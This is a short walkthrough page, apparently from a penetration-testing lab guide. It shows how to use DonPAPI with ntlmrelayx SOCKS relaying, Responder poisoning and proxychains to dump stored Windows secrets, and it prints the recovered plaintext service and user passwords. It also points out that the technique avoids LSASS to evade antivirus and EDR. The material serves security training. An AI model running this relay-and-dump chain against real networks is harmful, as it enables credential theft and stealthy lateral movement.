DonPapi

My third favorite tool to retreive secrets of windows with linux is donPAPI, it is used to get dpapi and other passwords stored informations (files, browser, schedule tasks,…). This tool don’t touch LSASS so it is stealthier and work most of the time even if av and edr are enabled on the target.

Installation

git clone https://github.com/login-securite/DonPAPI.git
cd DonPAPI
python3 -m pip install -r requirements.txt
python3 DonPAPI.py

Run ntlmrelayx.py and wait for a connecting for fernando.alonzo

sudo ntlmrelayx.py -socks -smb2support -tf unsigned_smb.txt

Run Responder

sudo responder -I enp0s3

Run DonPAPI

sudo proxychains python3 DonPAPI.py -no-pass 'NORTH'/'fernando.alonzo'@'192.168.56.22'

DonPapi give us the stored password for the sql service sql_svc:YouWillNotKerboroast1ngMeeeeee
We also get the password of fernando.alonzo: IDr1R3allyF@sTF1! due to a scheduled task setup on this computer too.

PreviousLsassy NextPass The Hash with Winpexec.py

Last updated 2 years ago